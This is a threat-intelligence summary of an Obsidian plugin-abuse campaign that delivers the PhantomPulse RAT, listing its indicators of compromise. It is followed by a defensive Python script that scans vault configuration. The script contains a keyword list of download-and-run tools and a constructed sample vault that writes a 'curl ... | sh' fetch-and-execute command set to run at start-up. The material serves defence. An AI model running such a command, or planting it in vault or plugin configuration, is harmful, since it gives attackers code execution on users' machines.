According to Elastic Security Labs, a novel social engineering campaign tracked as REF6598 abuses Obsidian’s community plugin ecosystem to gain initial access, targeting financial and cryptocurrency sector individuals via LinkedIn and Telegram. The attackers weaponise Obsidian’s Shell Commands and Hider plugins to silently execute code once a victim opens a shared cloud vault, delivering a multi-stage chain that culminates in the PhantomPulse RAT.
On Windows, the chain delivers an AES-256-CBC-encrypted loader in memory and uses module stomping for injection, while macOS employs an obfuscated AppleScript dropper with a Telegram fallback C2. The campaign utilises a blockchain-based C2 resolution mechanism, querying three Blockscout instances for on-chain transaction data from a hardcoded wallet to obtain the C2 URL, with a Cloudflare-proxied PhantomPulse panel as a fallback.
Observed infrastructure includes a staging server at 195.3.222[.]251, a PhantomPulse C2 domain at panel.fefea22134[.]net, and on-chain activity linked to wallet 0xc117688c530b660e15085bF3A2B664117d8672aA. Elastic Defend reportedly detected and blocked the attack at the early stage, preventing execution of the backdoor.
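The initial-access step above relies on a shared vault whose plugin configuration runs an OS command as soon as the vault is opened. The script below is an added example (not Elastic's code and not part of the report) of a triage check a defender can run over a vault before trusting it: it reads the vault's `.obsidian/community-plugins.json`, flags the Hider and Shell Commands plugins when enabled, and lists every configured shell command, raising severity when a command is wired to an automatic event or contains download-and-execute indicators. The plugin identifiers (`obsidian-shellcommands`, `obsidian-hider`), the `data.json` layout (`shell_commands` entries with `platform_specific_commands` and `events`), the event name `after-obsidian-starts`, and the sample vault contents are all assumptions constructed for this example.

```python
"""Triage an Obsidian vault for plugin config that runs OS commands on open.
Added example; plugin IDs, data.json layout and event names are assumptions."""
import json
import tempfile
from pathlib import Path

# Assumed plugin identifiers (directory names under .obsidian/plugins/).
SHELL_COMMANDS_ID = "obsidian-shellcommands"
HIDER_ID = "obsidian-hider"

# Substrings a reviewer would want to see first in any configured command.
SUSPICIOUS = ("curl", "wget", "powershell", "-enc", "osascript", "base64", "| sh", "|sh", "bash -c")


def _load_json(path: Path):
    """Parse a JSON file; return None if it is missing or malformed."""
    try:
        return json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None


def _commands(entry: dict) -> list:
    """Command strings from one shell_commands entry (assumed layout: a
    platform_specific_commands map and/or a plain shell_command string)."""
    cmds = []
    psc = entry.get("platform_specific_commands")
    if isinstance(psc, dict):
        cmds += [str(v) for v in psc.values() if v]
    if isinstance(entry.get("shell_command"), str):
        cmds.append(entry["shell_command"])
    return cmds


def _auto_events(entry: dict) -> list:
    """Names of enabled events (assumed layout: events map name -> {enabled: bool})."""
    ev = entry.get("events")
    if not isinstance(ev, dict):
        return []
    return [n for n, c in ev.items() if c is True or (isinstance(c, dict) and c.get("enabled"))]


def scan_vault(vault: str) -> list:
    """Return (severity, detail) findings for a vault directory; [] means nothing notable."""
    cfg = Path(vault) / ".obsidian"
    findings = []
    enabled = _load_json(cfg / "community-plugins.json")
    enabled = set(map(str, enabled)) if isinstance(enabled, list) else set()
    if HIDER_ID in enabled:
        findings.append(("medium", f"{HIDER_ID} enabled: vault can hide UI elements from the user"))
    data_path = cfg / "plugins" / SHELL_COMMANDS_ID / "data.json"
    if SHELL_COMMANDS_ID in enabled or data_path.is_file():
        findings.append(("medium", f"{SHELL_COMMANDS_ID} present: vault can run OS commands"))
    data = _load_json(data_path)
    entries = data.get("shell_commands", []) if isinstance(data, dict) else []
    for entry in entries:
        if not isinstance(entry, dict):
            continue
        events = _auto_events(entry)
        for cmd in _commands(entry):
            hits = [s for s in SUSPICIOUS if s in cmd.lower()]
            # Auto-triggered plus suspicious content is the pattern behind silent execution on open.
            sev = "critical" if events and hits else "high" if events else "medium" if hits else "low"
            detail = f"command {cmd!r}"
            if events:
                detail += f" auto-runs on {events}"
            if hits:
                detail += f" (matches {hits})"
            findings.append((sev, detail))
    return findings


def build_sample_vault(clean: bool = False) -> str:
    """Write a constructed throwaway vault to a temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="vault-"))
    cfg = root / ".obsidian"
    cfg.mkdir()
    if clean:
        (cfg / "community-plugins.json").write_text("[]")
        return str(root)
    (cfg / "community-plugins.json").write_text(json.dumps([SHELL_COMMANDS_ID, HIDER_ID]))
    plugin_dir = cfg / "plugins" / SHELL_COMMANDS_ID
    plugin_dir.mkdir(parents=True)
    sample = {"shell_commands": [
        {"id": "sample1",  # constructed: fetch-and-run wired to a start-up event
         "platform_specific_commands": {"default": "curl -s http://staging.invalid/s | sh"},
         "events": {"after-obsidian-starts": {"enabled": True}}},
        {"id": "sample2",  # constructed: benign, manual-only command
         "platform_specific_commands": {"default": "git pull"},
         "events": {}},
    ]}
    (plugin_dir / "data.json").write_text(json.dumps(sample))
    return str(root)


if __name__ == "__main__":
    for sev, detail in scan_vault(build_sample_vault()):
        print(f"[{sev}] {detail}")
```

Run it against a real vault with `scan_vault("/path/to/vault")`; any `high` or `critical` finding on a vault received from a third party means the plugin configuration should be reviewed before the vault is opened in Obsidian with community plugins enabled.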